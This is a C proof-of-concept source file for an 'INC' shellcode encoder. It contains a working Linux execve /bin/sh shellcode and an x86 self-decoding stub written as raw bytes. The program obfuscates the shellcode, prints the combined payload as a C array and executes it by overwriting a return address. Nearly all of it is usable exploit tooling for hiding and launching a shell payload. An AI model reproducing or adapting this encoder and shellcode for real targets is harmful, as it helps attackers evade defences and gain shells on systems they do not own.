/*
 * Proof-of-concept to test the decoder
 *
 * Rodrigo Rubira Branco <rodrigo@kernelhacking.com>
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 *
 * INC Shellcode encoder
 * 
 */

void execute(char *  data);

int main() {

  char decoder[] =
    // inc decoder
   "\xeb\x0b"	//                   jmp    d <label3>
   "\x5e"                  //    popl   %esi
   "\x6a\x00"              //     pushl  $0x0
   "\x59"                  //    popl   %ecx
   "\xfe\x06"                   // incb   (%esi)
   "\x46"                  //    incl   %esi
   "\xe2\xfb"               //    loopl  6 <label2>
   "\xeb\x05"               //    jmp    12 <label4>
   "\xe8\xf0\xff\xff\xff"; //          calll  2 <label1>

  /* Linux execve /bin/sh shellcode */
  char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

  char tmp;
  char *end;
  int size  = 1;
  int i; 
  int l = 15;
  
  for(i=0;i<strlen(shellcode);i++) {
    
    shellcode[i] -= size;
    
  }
  //decoder[6]  += strlen(shellcode); // decoder.S
  decoder[4]  += strlen(shellcode); // decoder.s

  
  end = (char *) malloc(strlen(shellcode) + strlen(decoder));
  
  strcat(end,decoder);
  strcat(end,shellcode);
  
  printf("\nDecoder: %d Shellcode: %d Result %d\n",strlen(decoder),strlen(shellcode),strlen(end));
  
  printf("\n\nchar shellcode[] =\n");
  
  for(i = 0; i < strlen(end); ++i) {
    if(l >= 15) {
      if(i) printf("\"\n");
      printf( "\t\"");
      l = 0;
    }
    ++l;
    printf("\\x%02x", ((unsigned char *)end)[i]);
  }
  
  
  fflush(stdout);
  
  printf("\";\n");
  
  execute(end);
  free(end);
}


void execute(char *data) {
  
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)data;
  
}